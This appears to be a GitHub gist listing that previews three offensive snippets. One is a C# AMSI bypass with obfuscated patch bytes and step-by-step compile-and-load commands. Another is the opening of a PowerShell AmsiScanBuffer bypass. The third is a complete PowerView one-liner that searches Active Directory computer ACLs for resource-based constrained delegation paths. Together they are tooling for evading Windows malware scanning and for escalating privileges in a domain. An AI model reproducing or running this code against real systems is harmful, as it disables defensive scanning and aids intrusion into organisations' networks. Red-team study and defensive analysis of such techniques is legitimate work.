FatRodzianko
FatRodzianko
/ my-dotnet-am-bypass.cs
Created
August 23, 2020 19:42
AMSI bypass that modifies the bytes of the patch and then changes them in a for loop. ".\csc.exe -target:library -out:C:\Exclusions\my-dotnet-am-bypass.dll C:\Exclusions\my-dotnet-am-bypass.cs" "Add-Type -Path C:\Exclusions\my-dotnet-am-bypass.dll" "[Amsi]::Bypass()"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Amsi | |
| { | |
| static byte[] patch = new byte[] { 0xBA, 0x59, 0x02, 0x09, 0x82, 0xC5 }; | |
| public static void Bypass() |
FatRodzianko
/ my-am-bypass.ps1
Last active
August 15, 2024 11:52
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Win32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32")] |
FatRodzianko
/ Get-RBCD.ps1
Created
December 18, 2019 21:14
Use Powerview to find resource-based constrained delegation (RBCD) in active directory
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get all sids, all computer object ACLs, and find RBCD!!! | |
| $usersid = get-domainuser | select -exp objectsid; "Got user SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $usersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } } | |
| # Get all SIDS, all computer object ACLs, and find RBCD | |
| $groupsid = $groups = Get-DomainGroup | Where-Object {$_.SamAccountName -ne "Domain Admins" -and $_.SamAccountName -ne "Account Operators" -and $_.SamAccountName -ne "Enterprise Admins" -and $_.SamAccountName -ne "Administrators" -and $_.SamAccountName -ne "DnsAdmins" -and $_.SamAccountName -ne "Schema Admins" -and $_.SamAccountName -ne "Key Admins" -and $_.SamAccountName -ne "Enterprise Key Admins" -and $_.SamAccountName -ne "Storage |